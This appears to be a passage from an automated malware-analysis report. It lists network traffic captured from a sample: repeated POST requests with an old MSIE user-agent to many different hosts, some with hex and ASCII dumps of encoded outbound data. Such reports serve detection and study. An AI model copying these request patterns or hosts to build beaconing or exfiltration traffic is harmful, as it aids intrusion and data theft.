oy7GPYhr09IRbku3CLUdmw5ENXgqz8HQZis1AJSbku3CQcmw5ENWfpy7GPYis1AJSbku4DMVeox6FOXhr09IScmw5ENWfpy8HQZis1AJSbkv4DMVeox6FOXgr09IRajt2CLUdmw5ENWfpy7GPZis1AJSbku3EOXhr09IRajt2BKTclv4DNWfpy7GPYhr0AJSbku3CLUdox6FOXgqz9IRajt3CLUdox6FOXgqz8HQajt2BKTclv4DMVepy7GPZis1AKTclv4DMUgs1AMVeo0Ggqz8HQZis1AJSbku3CLUdmw5ENXgqz8HQZis1AJSdox6GPYhr09ISclv4DMVeox6FOajt2BKTclv4DMVeoy7GPYhr1AKTclv4DMVeox6FPYhr1AJSbkt3CLUdmw5ENWfpy7GPYhr09IRajt2BKTclu3DMVeox6FOXgqz8ISajt2BKUclw5ENWfpy7GPYhr09IRajt2BKTclv4DMVeox6FOXgqz8HQZis1AJSbku3CLUdmw5FOXgqy7HPYhr09IRajt2BKTclv4DMVRox7GQYhr0AJSbku3CLTcmw5ENWeox6FPYhr09IRajt2BKTclv4DMVeox6FOXg
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1421User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yhsll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 61 32 34 74 57 34 59 66 58 53 62 6e 4a 30 6f 6e 6f 66 48 4f 58 61 6b 69 62 67 48 6d 34 33 46 67 47 72 79 41 43 53 59 44 42 53 75 6f 5a 47 58 6a 38 59 62 33 63 62 5a 37 6f 7a 68 46 70 57 4a 73 52 6e 4b 46 45 30 4f 36 38 35 78 6a 6f 69 35 55 79 43 4b 33 37 53 6d 61 52 68 37 67 39 65 45 4c 30 2b 75 47 58 55 63 63 59 36 48 65 62 6c 4c 50 38 52 50 5a 75 5a 76 6b 49 7a 46 7a 4a 4c 36 7a 6f 4a 30 75 6f 4b 6d 4f 31 2b 64 58 39 6a 33 59 41 79 67 4e 6c 37 64 32 49 49 65 65 6e 77 32 38 56 69 4f 34 54 2f 6b 62 65 64 54 52 30 4b 31 77 43 71 70 36 50 4f 32 38 51 67 6d 66 31 33 61 31 61 35 77 5a 2f 37 49 72 71 63 54 31 39 54 2f 76 76 4e 48 4a 6c 33 76 39 6f 42 79 62 6f 32 74 36 6f 72 4c 68 68 5a 68 47 79 46 47 33 6e 65 7a 34 6e 64 78 64 34 42 45 59 70 71 4c 38 4b 6d 73 72 67 58 56 62 69 75 52 63 4a 38 6e 59 4a 77 78 74 44 4a 2f 4b 6d 5a 43 6c 4c 75 4c 31 2f 6a 30 46 6f 31 33 6a 53 56 2b 4e 56 43 51 4c 30 71 74 51 72 6a 48 43 34 78 34 55 63 7a 4e 66 71 4c 68 30 59 71 6f 56 35 39 33 4b 52 6e 55 73 31 48 38 63 64 31 52 6f 4e 35 45 54 65 76 52 37 70 55 4b 50 57 72 32 55 63 47 44 66 63 7a 43 4a 2b 59 45 69 43 58 74 58 2b 36 5a 65 54 77 47 2f 6a 39 51 4e 58 56 62 68 47 4a 58 4a 2f 38 44 6d 44 42 38 5a 76 43 4c 66 74 64 65 52 42 47 5a 44 2f 62 76 6c 64 4c 4e 77 61 31 6c 4f 2f 75 52 74 42 77 53 45 56 34 4f 6f 55 69 46 30 58 7a 2b 39 74 7a 6e 6c 76 6b 71 4d 77 79 55 34 50 70 62 6f 39 4c 6e 48 38 65 54 4c 61 5a 6f 75 4d 4c 50 64 32 36 63 57 6e 77 79 6b 41 49 53 6a 2b 64 65 57 50 4b 6e 68 6a 66 2b 42 64 43 34 30 42 42 4a 71 39 77 2b 42 2b 4b 75 7a 59 66 69 33 4f 62 75 74 75 73 49 4d 6b 51 36 73 65 53 4b 52 52 50 54 58 Data Ascii: a24tW4YfXSbnJ0onofHOXakibgHm43FgGryACSYDBSuoZGXj8Yb3cbZ7ozhFpWJsRnKFE0O685xjoi5UyCK37SmaRh7g9eEL0+uGXUccY6HeblLP8RPZuZvkIzFzJL6zoJ0uoKmO1+dX9j3YAygNl7d2IIeenw28ViO4T/kbedTR0K1wCqp6PO28Qgmf13a1a5wZ/7IrqcT19T/vvNHJl3v9oBybo2t6orLhhZhGyFG3nez4ndxd4BEYpqL8KmsrgXVbiuRcJ8nYJwxtDJ/KmZClLuL1/j0Fo13jSV+NVCQL0qtQrjHC4x4UczNfqLh0YqoV593KRnUs1H8cd1RoN5ETevR7pUKPWr2UcGDfczCJ+YEiCXtX+6ZeTwG/j9QNXVbhGJXJ/8DmDB8ZvCLftdeRBGZD/bvldLNwa1lO/uRtBwSEV4OoUiF0Xz+9tznlvkqMwyU4Ppbo9LnH8eTLaZouMLPd26cWnwykAISj+deWPKnhjf+BdC40BBJq9w+B+KuzYfi3ObutusIMkQ6seSKRRPTX
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1620User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: pccj.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 901User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: tozzhin.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1042User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: kavram.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 277User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: wantapc.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 47 54 64 6d 77 36 46 4f 58 68 72 31 41 4a 54 63 6c 77 35 46 4f 59 69 73 32 42 4c 55 64 6f 78 36 47 50 5a 69 73 32 42 4b 55 64 6f 78 36 46 50 59 69 73 31 42 4b 54 64 6d 77 36 46 4f 59 68 73 31 41 4b 55 64 6d 78 36 47 50 59 6a 74 33 43 4c 56 65 6f 79 37 48 51 5a 6a 74 32 43 4c 56 65 6f 79 37 47 51 5a 6a 74 32 43 4c 55 65 6f 79 37 47 50 5a 69 73 32 42 4b 55 64 6d 78 36 47 50 59 69 73 31 42 4c 55 65 6f 78 37 47 50 5a 69 73 32 42 4c 55 64 6d 78 36 46 50 5a 69 73 32 42 4b 55 64 6f 78 36 47 50 5a 69 73 32 42 4b 55 64 6d 78 36 46 50 59 68 73 31 41 4a 54 63 6c 77 35 45 4f 58 68 72 31 41 4b 54 64 6d 77 36 46 50 59 68 73 31 41 4b 54 63 6d 77 35 46 4f 58 68 72 30 41 4a 53 63 6c 76 35 45 4f 58 67 72 30 39 4a 53 63 6c 76 35 45 4e 58 67 71 30 39 49 53 62 6b 76 34 45 4e 57 67 72 30 39 4a 53 62 6c 76 35 45 4e 5a 69 74 32 42 4c 55 64 6f Data Ascii: GTdmw6FOXhr1AJTclw5FOYis2BLUdox6GPZis2BKUdox6FPYis1BKTdmw6FOYhs1AKUdmx6GPYjt3CLVeoy7HQZjt2CLVeoy7GQZjt2CLUeoy7GPZis2BKUdmx6GPYis1BLUeox7GPZis2BLUdmx6FPZis2BKUdox6GPZis2BKUdmx6FPYhs1AJTclw5EOXhr1AKTdmw6FPYhs1AKTcmw5FOXhr0AJSclv5EOXgr09JSclv5ENXgq09ISbkv4ENWgr09JSblv5ENZit2BLUdo
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1660User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yhsll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1641User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: karila.frConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 56 66 44 4f 6b 76 4e 54 55 6e 47 41 6a 73 6c 54 4f 67 6a 4c 2f 5a 7a 71 2f 4e 35 5a 4f 55 6f 4c 31 34 41 32 58 59 42 75 53 59 69 78 76 56 33 49 4c 4e 54 58 5a 47 4f 30 76 77 6b 76 39 31 79 35 57 4a 41 79 7a 48 31 6d 74 52 70 7a 61 59 4e 57 69 35 6e 53 50 64 6e 45 41 67 46 4d 36 43 53 33 6c 31 41 71 63 54 48 5a 7a 62 5a 5a 43 71 56 61 4f 46 34 39 7a 66 77 79 33 67 62 53 75 5a 44 61 50 55 57 53 41 78 30 4b 6f 2b 57 71 5a 51 67 6f 61 2b 6a 47 31 44 71 33 45 32 35 6f 79 73 6d 70 5a 54 2f 78 77 48 4e 2b 4b 77 48 76 59 65 55 74 6b 79 4c 63 38 36 69 6b 62 7a 55 4f 4f 42 46 51 70 41 51 48 57 51 62 32 31 79 46 31 73 57 5a 2f 47 4c 54 4e 6f 43 4a 78 42 43 6e 73 65 2f 6e 4b 57 77 5a 64 41 6b 6c 47 36 38 69 68 41 44 6f 38 70 61 57 57 51 41 36 62 47 57 51 62 39 30 43 52 76 78 2f 38 63 35 36 6d 2f 4b 36 51 71 39 48 78 70 42 53 42 4b 52 30 65 67 33 4b 68 47 59 37 6c 68 66 68 5a 79 36 6d 70 38 6b 6e 7a 68 75 4f 32 46 55 39 54 65 6e 46 41 4e 56 66 35 74 76 4e 6a 6f 32 30 33 66 45 44 33 36 33 35 76 71 52 75 44 41 4d 2b 41 4b 6d 6f 68 6e 32 54 31 6a 32 74 7a 6f 4d 49 65 34 2b 67 6a 54 6f 54 51 61 35 6d 75 7a 58 4c 77 66 51 2f 43 5a 6e 4e 33 55 4c 4e 7a 6e 57 69 48 4a 53 46 7a 33 53 64 4f 6a 53 6c 75 67 42 78 65 69 61 4c 71 54 46 62 73 65 71 68 61 2b 46 66 58 62 72 56 31 58 59 43 42 56 50 53 6a 4d 7a 30 50 68 4e 7a 30 62 63 78 69 78 52 52 6e 61 4e 65 6d 34 72 2b 78 4c 49 75 2f 42 67 59 76 74 75 57 45 54 41 6f 49 64 68 76 37 76 68 4b 67 64 51 6b 54 6a 4f 45 49 45 45 78 45 77 68 43 58 57 51 6d 53 35 4b 32 7a 47 6b 63 61 4f 6a 50 6d 51 58 47 67 6a 68 50 66 5a 38 4e 71 33 35 4e 75 4d 61 4a 42 78 39 6e 6b 45 4c 52 51 2b 73 56 74 57 57 42 33 66 50 37 77 47 70 53 5a 69 6e 59 7a 38 6c 78 76 4d 61 6b 3d Data Ascii: VfDOkvNTUnGAjslTOgjL/Zzq/N5ZOUoL14A2XYBuSYixvV3ILNTXZGO0vwkv91y5WJAyzH1mtRpzaYNWi5nSPdnEAgFM6CS3l1AqcTHZzbZZCqVaOF49zfwy3gbSuZDaPUWSAx0Ko+WqZQgoa+jG1Dq3E25oysmpZT/xwHN+KwHvYeUtkyLc86ikbzUOOBFQpAQHWQb21yF1sWZ/GLTNoCJxBCnse/nKWwZdAklG68ihADo8paWWQA6bGWQb90CRvx/8c56m/K6Qq9HxpBSBKR0eg3KhGY7lhfhZy6mp8knzhuO2FU9TenFANVf5tvNjo203fED3635vqRuDAM+AKmohn2T1j2tzoMIe4+gjToTQa5muzXLwfQ/CZnN3ULNznWiHJSFz3SdOjSlugBxeiaLqTFbseqha+FfXbrV1XYCBVPSjMz0PhNz0bcxixRRnaNem4r+xLIu/BgYvtuWETAoIdhv7vhKgdQkTjOEIEExEwhCXWQmS5K2zGkcaOjPmQXGgjhPfZ8Nq35NuMaJBx9nkELRQ+sVtWWB3fP7wGpSZinYz8lxvMak=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1325User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: kevyt.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1358User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mjrcpas.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 924User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: nrsi.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 4f 51 46 6b 70 42 2f 6d 55 6e 45 79 63 4b 72 31 66 76 78 62 66 71 67 31 68 51 48 31 64 4f 48 54 77 77 63 36 68 4f 62 69 2f 32 63 55 78 51 66 39 57 79 65 7a 53 56 4a 7a 61 6a 39 58 64 71 2f 69 38 56 65 52 4a 4f 4e 52 33 65 38 33 79 68 57 4b 35 58 58 57 50 43 2f 30 75 4e 32 30 46 68 41 38 70 4b 48 65 46 64 33 55 47 36 70 48 43 30 69 76 56 50 72 77 69 67 63 5a 68 46 56 30 37 31 75 48 58 33 43 37 58 39 4f 69 6c 76 59 4c 63 6f 6b 57 76 6e 6b 35 45 30 32 47 6d 75 50 37 4e 51 35 62 48 75 31 46 59 69 4a 64 64 33 2f 2f 75 51 64 4d 78 51 31 71 74 79 34 38 54 71 43 42 41 56 59 38 58 44 63 6a 30 31 62 6c 52 4f 4e 67 67 77 39 36 32 2b 6c 4a 6a 35 4a 53 53 41 67 73 42 72 44 73 6d 6e 48 52 62 35 47 34 38 36 49 68 45 4e 75 43 4b 43 4e 37 78 53 33 43 66 42 7a 6e 58 2f 50 39 6c 79 78 4a 45 63 39 2f 71 41 44 79 7a 57 69 34 54 71 35 47 30 75 6f 51 76 73 2f 55 74 73 53 35 34 49 44 33 38 4d 71 62 47 52 33 46 54 6e 6f 4c 4f 77 57 72 45 33 72 4f 53 57 6d 4b 76 2b 6e 53 54 49 6f 6a 4e 6c 6a 73 72 6e 30 42 5a 77 4a 6b 46 44 75 34 58 51 6f 6e 56 53 55 55 59 73 65 47 48 46 43 52 49 45 30 63 36 71 4d 70 41 66 7a 50 36 49 63 56 76 49 2b 4f 32 4b 45 4e 57 78 74 77 66 66 70 44 76 59 55 77 73 6b 4e 37 41 74 2f 39 48 62 56 72 70 36 68 37 50 75 36 2f 79 56 41 66 50 6f 38 77 74 58 4a 4f 34 45 55 70 32 54 59 63 46 79 51 6f 2b 55 36 50 6d 6a 49 6e 69 59 51 30 77 59 44 63 72 62 5a 37 45 77 75 54 5a 6e 51 4b 72 45 31 53 43 58 6d 42 41 74 73 61 63 2b 45 38 31 2b 4a 37 7a 68 4e 33 31 47 7a 58 51 4b 2f 54 4c 38 78 68 4b 59 4e 4e 69 36 39 5a 48 39 36 41 30 4b 37 5a 39 56 7a 56 51 5a 65 6c 49 73 50 74 68 45 47 39 57 67 4a 45 74 64 44 36 78 54 52 73 4e 6f 33 49 61 67 70 50 56 4f 7a 4d 30 48 4d 62 73 4d 32 70 65 6f 39 74 58 77 64 50 6a 6e 61 59 47 2b 51 42 74 2f 63 45 32 43 66 65 73 74 53 65 42 72 30 53 4b 53 2f 54 Data Ascii: OQFkpB/mUnEycKr1fvxbfqg1hQH1dOHTwwc6hObi/2cUxQf9WyezSVJzaj9Xdq/i8VeRJONR3e83yhWK5XXWPC/0uN20FhA8pKHeFd3UG6pHC0ivVPrwigcZhFV071uHX3C7X9OilvYLcokWvnk5E02GmuP7NQ5bHu1FYiJdd3//uQdMxQ1qty48TqCBAVY8XDcj01blRONggw962+lJj5JSSAgsBrDsmnHRb5G486IhENuCKCN7xS3CfBznX/P9lyxJEc9/qADyzWi4Tq5G0uoQvs/UtsS54ID38MqbGR3FTnoLOwWrE3rOSWmKv+nSTIojNljsrn0BZwJkFDu4XQonVSUUYseGHFCRIE0c6qMpAfzP6IcVvI+O2KENWxtwffpDvYUwskN7At/9HbVrp6h7Pu6/yVAfPo8wtXJO4EUp2TYcFyQo+U6PmjIniYQ0wYDcrbZ7EwuTZnQKrE1SCXmBAtsac+E81+J7zhN31GzXQK/TL8xhKYNNi69ZH96A0K7Z9VzVQZelIsPthEG9WgJEtdD6xTRsNo3IagpPVOzM0HMbsM2peo9tXwdPjnaYG+QBt/cE2CfestSeBr0SKS/T
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 4c 42 65 37 74 75 46 2b 55 33 46 4f 37 6b 6a 77 51 41 6f 7a 70 72 72 46 50 78 48 66 38 59 4d 48 70 5a 4d 61 46 41 45 49 35 4b 65 6e 4e 75 62 79 6f 64 70 46 4b 30 5a 39 54 6e 5a 39 5a 61 30 51 37 41 6f 45 6e 51 77 79 6c 45 2b 64 72 59 47 59 6e 65 69 2f 6c 6b 37 6c 54 48 4c 49 54 30 65 59 62 75 34 68 48 79 67 4c 5a 66 65 35 45 36 5a 37 65 4b 30 76 61 6c 30 68 77 4b 37 44 63 69 47 48 65 42 2f 5a 42 66 46 6e 67 34 61 54 65 69 6f 54 4d 79 63 73 73 51 61 31 76 59 39 44 2b 30 4d 35 4b 59 6f 54 61 34 6d 52 69 37 59 69 4d 76 41 64 35 54 4f 78 34 4f 6d 48 4c 62 4c 6c 67 4e 41 6b 48 68 63 41 76 4c 59 70 5a 78 51 72 62 63 63 49 68 4a 64 55 5a 63 79 35 71 4a 45 4b 69 4f 41 34 31 30 31 73 54 57 6f 59 4e 43 4c 45 33 33 63 39 2b 78 4d 4f 37 52 4f 6c 75 54 39 68 2b 57 71 67 49 79 4d 72 6b 43 77 63 67 31 42 65 33 56 31 30 4f 37 50 4b 57 76 75 6c 4b 72 38 32 39 2f 70 4d 58 77 53 65 37 77 72 55 53 65 74 72 57 64 43 70 61 6e 2b 34 74 6e 62 30 6f 50 73 2b 38 43 37 75 6e 69 44 71 66 71 72 41 68 5a 4c 65 31 6e 4b 4e 72 75 70 6c 63 75 2f 77 65 67 4f 46 35 59 56 57 6d 2f 32 4a 37 62 59 6b 73 71 39 49 69 75 62 65 33 41 6c 6b 4f 6d 64 79 4f 46 4f 57 37 4b 4a 48 30 56 69 4f 4a 33 76 6e 54 41 51 6c 77 66 66 36 68 44 72 79 67 64 55 6d 6f 2f 65 67 65 33 6d 69 58 49 53 4f 6a 42 4c 65 61 57 4b 41 75 41 62 31 55 35 6a 66 55 79 53 78 6d 44 6e 6b 78 57 38 73 37 45 6e 4f 38 6d 59 2b 2f 6d 4b 41 49 62 64 7a 42 6f 51 33 65 56 65 64 4b 63 5a 2f 39 47 36 41 46 33 44 75 71 78 75 36 55 67 5a 63 69 59 68 35 32 33 75 38 5a 34 33 30 72 6d 51 6e 6f 6f 36 56 4f 4b 31 35 31 79 67 7a 4b 77 33 63 6c 76 48 62 48 41 57 39 36 49 53 46 7a 39 6c 78 35 4f 34 76 Data Ascii: LBe7tuF+U3FO7kjwQAozprrFPxHf8YMHpZMaFAEI5KenNubyodpFK0Z9TnZ9Za0Q7AoEnQwylE+drYGYnei/lk7lTHLIT0eYbu4hHygLZfe5E6Z7eK0val0hwK7DciGHeB/ZBfFng4aTeioTMycssQa1vY9D+0M5KYoTa4mRi7YiMvAd5TOx4OmHLbLlgNAkHhcAvLYpZxQrbccIhJdUZcy5qJEKiOA4101sTWoYNCLE33c9+xMO7ROluT9h+WqgIyMrkCwcg1Be3V10O7PKWvulKr829/pMXwSe7wrUSetrWdCpan+4tnb0oPs+8C7uniDqfqrAhZLe1nKNruplcu/wegOF5YVWm/2J7bYksq9Iiube3AlkOmdyOFOW7KJH0ViOJ3vnTAQlwff6hDrygdUmo/ege3miXISOjBLeaWKAuAb1U5jfUySxmDnkxW8s7EnO8mY+/mKAIbdzBoQ3eVedKcZ/9G6AF3Duqxu6UgZciYh523u8Z430rmQnoo6VOK151ygzKw3clvHbHAW96ISFz9lx5O4v
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1106User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sgk.home.plConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1421User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yhsll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 362User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ntc.edu.auConnection: Keep-AliveCache-Control: no-cacheData Raw: 76 35 44 4c 54 65 72 30 38 47 4e 56 65 6d 76 32 41 49 50 58 66 71 78 35 44 4c 55 63 6b 74 30 38 47 50 57 65 6d 75 32 41 49 50 58 66 6d 76 33 42 49 51 59 67 6f 77 34 43 4a 52 5a 67 70 78 34 43 4c 55 64 6c 75 31 39 48 4f 57 65 6c 75 32 41 48 50 58 65 6f 77 33 42 4b 53 61 68 71 7a 36 45 4d 55 62 6a 74 32 41 49 51 59 68 71 79 36 45 4d 55 62 6a 73 30 37 46 4e 57 65 6d 76 32 42 4a 53 5a 69 72 7a 37 45 4d 55 63 6a 73 30 37 46 4e 55 63 6b 73 30 38 47 4f 58 77 41 49 51 59 67 70 78 35 44 4c 53 61 6b 75 31 41 48 50 58 66 6f 77 33 42 4a 52 5a 68 71 79 36 44 4c 54 62 6a 73 33 42 4c 55 64 6c 76 35 44 4f 58 66 6f 76 36 47 54 62 6c 78 38 4b 57 67 72 30 38 47 4f 57 65 6d 76 32 41 49 51 59 67 70 78 35 44 4c 53 64 71 7a 41 49 51 61 6c 30 39 48 50 62 6d 76 33 43 4e 55 63 6b 74 31 39 48 50 58 66 6f 77 34 43 4a 52 5a 68 71 79 36 44 4c 54 62 6a 73 30 37 46 4e 56 64 6c 74 31 39 48 50 58 66 6d 76 33 42 4a 52 5a 68 70 78 35 44 4c 54 62 69 72 7a 37 46 4e 56 63 6b 77 34 4c 54 62 6a 73 7a 37 46 4e 55 63 6b 74 30 38 47 4f 56 64 6c 75 33 43 4a 52 5a 67 70 79 37 45 4d 59 67 70 78 34 44 4c 55 63 6b 74 Data Ascii: v5DLTer08GNVemv2AIPXfqx5DLUckt08GPWemu2AIPXfmv3BIQYgow4CJRZgpx4CLUdlu19HOWelu2AHPXeow3BKSahqz6EMUbjt2AIQYhqy6EMUbjs07FNWemv2BJSZirz7EMUcjs07FNUcks08GOXwAIQYgpx5DLSaku1AHPXfow3BJRZhqy6DLTbjs3BLUdlv5DOXfov6GTblx8KWgr08GOWemv2AIQYgpx5DLSdqzAIQal09HPbmv3CNUckt19HPXfow4CJRZhqy6DLTbjs07FNVdlt19HPXfmv3BJRZhpx5DLTbirz7FNVckw4LTbjsz7FNUckt08GOVdlu3CJRZgpy7EMYgpx4DLUckt
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1213User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: cbaben.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 34 77 63 72 68 68 73 37 57 6e 45 50 56 53 67 62 4d 72 55 7a 74 77 54 67 42 75 53 68 41 31 4f 68 66 34 34 74 4c 57 4c 68 56 34 64 43 36 62 76 63 53 74 30 70 71 50 62 34 56 5a 49 55 31 77 68 71 39 34 6d 78 57 68 61 50 59 35 4f 73 44 6a 2b 32 4c 63 65 32 52 75 6d 6f 52 33 74 50 59 6b 63 55 6a 4a 68 79 4b 4e 2f 38 33 45 78 75 31 46 34 7a 39 74 43 79 58 64 69 4a 78 34 4a 4b 59 44 67 72 55 4e 67 58 53 58 47 6e 6c 5a 69 4d 32 70 50 65 4a 50 34 39 42 6b 62 63 76 67 4d 77 7a 2f 4a 5a 75 6b 65 66 2b 4d 57 45 56 2b 55 56 4a 42 59 7a 2b 30 41 49 78 49 66 34 30 45 55 6e 38 39 75 4b 69 63 43 6a 31 47 6b 55 47 2f 44 61 4b 66 51 42 32 33 49 66 42 51 48 49 65 4e 4f 33 71 63 7a 54 4a 73 51 44 6a 56 38 5a 39 4b 53 34 33 51 49 44 62 4b 33 46 41 44 76 4f 5a 48 61 2f 49 6c 6a 2f 77 44 44 36 4f 31 64 34 58 76 4a 2f 65 76 67 68 37 65 78 51 70 73 59 6e 61 38 58 63 49 31 41 30 38 39 5a 44 47 46 31 31 30 4a 6a 47 70 34 42 64 50 67 64 47 48 37 65 48 30 33 31 53 4a 44 57 4c 4a 67 48 73 35 35 68 5a 43 2b 54 45 64 53 4e 72 70 44 37 53 51 63 7a 70 6e 35 59 34 42 49 6d 78 49 2f 6f 6f 43 6f 46 43 45 46 37 38 49 67 44 51 34 36 35 6e 50 74 75 41 79 79 63 41 6f 6a 56 69 51 74 47 78 54 78 6c 5a 67 41 6b 7a 58 4b 68 48 69 72 6d 67 67 5a 54 4f 4c 75 35 48 4f 57 75 7a 5a 6c 77 4c 38 77 61 35 68 56 63 6f 61 4d 36 56 52 53 55 55 47 53 2b 4e 45 4e 36 4b 57 5a 6b 47 35 74 47 30 58 6e 70 36 6d 56 38 5a 4e 65 65 7a 57 57 64 55 36 31 47 49 67 75 65 71 43 69 65 42 4d 35 35 6a 4d 2f 72 69 6e 34 31 34 6c 38 57 41 4b 6d 78 47 57 33 44 5a 43 6a 69 50 43 6e 67 46 4e 67 76 57 6f 68 65 74 62 2f 31 72 73 42 4d 2f 31 72 44 52 57 46 44 6e 72 6c 71 73 64 36 36 32 73 2b 2b 48 56 4a 43 70 63 44 63 3d Data Ascii: 4wcrhhs7WnEPVSgbMrUztwTgBuShA1Ohf44tLWLhV4dC6bvcSt0pqPb4VZIU1whq94mxWhaPY5OsDj+2Lce2RumoR3tPYkcUjJhyKN/83Exu1F4z9tCyXdiJx4JKYDgrUNgXSXGnlZiM2pPeJP49BkbcvgMwz/JZukef+MWEV+UVJBYz+0AIxIf40EUn89uKicCj1GkUG/DaKfQB23IfBQHIeNO3qczTJsQDjV8Z9KS43QIDbK3FADvOZHa/Ilj/wDD6O1d4XvJ/evgh7exQpsYna8XcI1A089ZDGF110JjGp4BdPgdGH7eH031SJDWLJgHs55hZC+TEdSNrpD7SQczpn5Y4BImxI/ooCoFCEF78IgDQ465nPtuAyycAojViQtGxTxlZgAkzXKhHirmggZTOLu5HOWuzZlwL8wa5hVcoaM6VRSUUGS+NEN6KWZkG5tG0Xnp6mV8ZNeezWWdU61GIgueqCieBM55jM/rin414l8WAKmxGW3DZCjiPCngFNgvWohetb/1rsBM/1rDRWFDnrlqsd662s++HVJCpcDc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 42 69 7a 5a 55 53 65 49 57 48 48 39 67 47 39 47 31 6d 66 38 6a 2f 41 4d 4f 44 57 64 30 38 53 37 53 77 5a 6f 65 74 38 37 4d 44 4a 78 2b 4b 31 35 34 6b 4d 6b 63 6b 71 52 37 76 39 75 59 52 72 4e 4b 48 5a 6b 55 6b 35 6b 4d 65 75 72 2b 76 41 54 58 48 34 5a 67 4e 38 70 77 6d 4f 6d 68 57 4a 52 77 67 6b 47 39 6f 4d 36 73 74 46 2f 36 66 4d 77 4c 6f 61 54 33 78 42 61 44 65 75 50 45 4c 34 59 5a 78 4b 58 62 45 39 6f 2b 4f 78 74 4b 49 7a 55 70 70 2b 61 4c 4a 37 4e 31 33 73 54 36 73 73 72 55 68 56 58 4d 52 6c 6e 4c 64 31 51 5a 43 44 39 6c 4d 61 78 7a 47 36 57 55 38 35 4e 41 2f 46 56 39 77 7a 75 56 6c 4a 6d 50 57 44 51 4b 72 4c 4f 45 31 79 43 4a 4a 55 48 43 67 57 68 46 74 37 6d 74 33 77 45 36 53 36 32 50 4d 33 32 43 50 37 42 42 50 32 78 68 66 59 34 4e 76 54 70 4e 41 66 53 77 